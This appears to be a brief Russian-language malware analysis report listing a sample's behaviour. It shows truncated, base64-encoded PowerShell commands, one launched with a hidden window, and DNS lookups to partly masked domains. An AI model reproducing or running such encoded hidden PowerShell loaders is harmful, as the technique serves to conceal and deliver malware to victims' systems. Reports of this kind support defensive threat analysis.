Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABwAGEAbgBlAGwAdwB3AGIAPQAnAFQAZQBjAGgAbgBpAGMAaQBhAG4AegB6AGoAJwA7ACQAbgBvAG4AdgBvAGwAYQB0AGkAbAB...
- DNS ASK ga###trefa.com
- DNS ASK do##news.pl
- DNS ASK si#####trevakhoe.com
- DNS ASK ae##aft.ca
- DNS ASK em#####ces.besancon.fr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABwAGEAbgBlAGwAdwB3AGIAPQAnAFQAZQBjAGgAbgBpAGMAaQBhAG4AegB6AGoAJwA7ACQAbgBvAG4AdgBvAGwAYQB0AGkAbAB...' (со скрытым окном)